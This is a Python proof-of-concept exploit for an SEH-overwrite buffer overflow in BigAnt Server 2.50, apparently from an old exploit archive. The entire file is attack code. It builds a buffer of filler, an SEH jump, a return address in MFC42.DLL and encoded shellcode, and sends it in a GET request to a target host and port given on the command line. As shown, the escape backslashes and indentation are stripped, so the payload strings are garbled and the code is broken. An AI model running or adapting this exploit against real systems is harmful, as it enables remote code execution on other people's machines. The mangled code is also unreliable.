#!/usr/bin/python
# by hack4love
# BigAnt Server version 2.50 SEH Overwrite Universal
# discovered by Blake http://www.milw0rm.com/exploits/9673
# Tested on Windows XP SP2
# gratez to Blake
# use >> bigant.py 192.168.1.12 6660


import socket, sys

if len(sys.argv)!= 3:
print "n[*] Usage: %s <ip> <port>n" % sys.argv[0]
sys.exit(0)

host = sys.argv[1]
port = int(sys.argv[2]) # port 6660 by default


shellcode = (
"xebx03x59xebx05xe8xf8xffxffxffx49x49x49x49x49x49"
"x49x49x49x49x37x49x49x49x49x49x49x49x51x5ax6ax41"
"x58x50x30x42x31x41x42x6bx42x41x51x32x42x42x32x41"
"x41x30x41x41x42x58x38x42x42x50x75x4bx59x4bx4cx59"
"x78x52x64x63x30x65x50x53x30x4ex6bx57x35x77x4cx6c"
"x4bx61x6cx63x35x73x48x67x71x48x6fx6ex6bx50x4fx45"
"x48x6ex6bx53x6fx61x30x73x31x38x6bx53x79x4ex6bx66"
"x54x6ex6bx46x61x38x6ex30x31x6bx70x6ex79x6ex4cx4f"
"x74x79x50x74x34x44x47x4fx31x59x5ax76x6dx55x51x59"
"x52x68x6bx4ax54x35x6bx71x44x65x74x37x74x31x65x4a"
"x45x6ex6bx73x6fx44x64x55x51x4ax4bx50x66x4cx4bx44"
"x4cx30x4bx6ex6bx53x6fx37x6cx46x61x58x6bx6cx4bx77"
"x6cx6ex6bx46x61x5ax4bx4fx79x31x4cx47x54x37x74x6a"
"x63x74x71x59x50x70x64x6ex6bx51x50x50x30x6ex65x4b"
"x70x72x58x64x4cx6cx4bx71x50x56x6cx4ex6bx52x50x57"
"x6cx6cx6dx4cx4bx63x58x73x38x5ax4bx45x59x4ex6bx4f"
"x70x4cx70x35x50x43x30x63x30x4cx4bx53x58x77x4cx73"
"x6fx56x51x48x76x53x50x66x36x4fx79x39x68x6fx73x39"
"x50x61x6bx30x50x61x78x4ax50x6cx4ax73x34x33x6fx45"
"x38x6dx48x49x6ex6cx4ax46x6ex76x37x69x6fx48x67x45"
"x33x73x51x72x4cx71x73x63x30x41")


payload = "x41" * 985
next_seh = "xebx06x90x90"
seh = "xc3x20xc4x6b" #MFC42.DLL
nops = "x90" * 10
sec = shellcode

print "[+] Connecting to %s on port %d" % (host,port)
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
s.connect((host,port))
except:
print "[x] Error establishing connectionn"
sys.exit(0)

print "[+] Sending payload"
s.send("GET " + payload + next_seh + seh + nops + sec + "rnrn")
s.close()

# www.Syue.com [2009-09-15]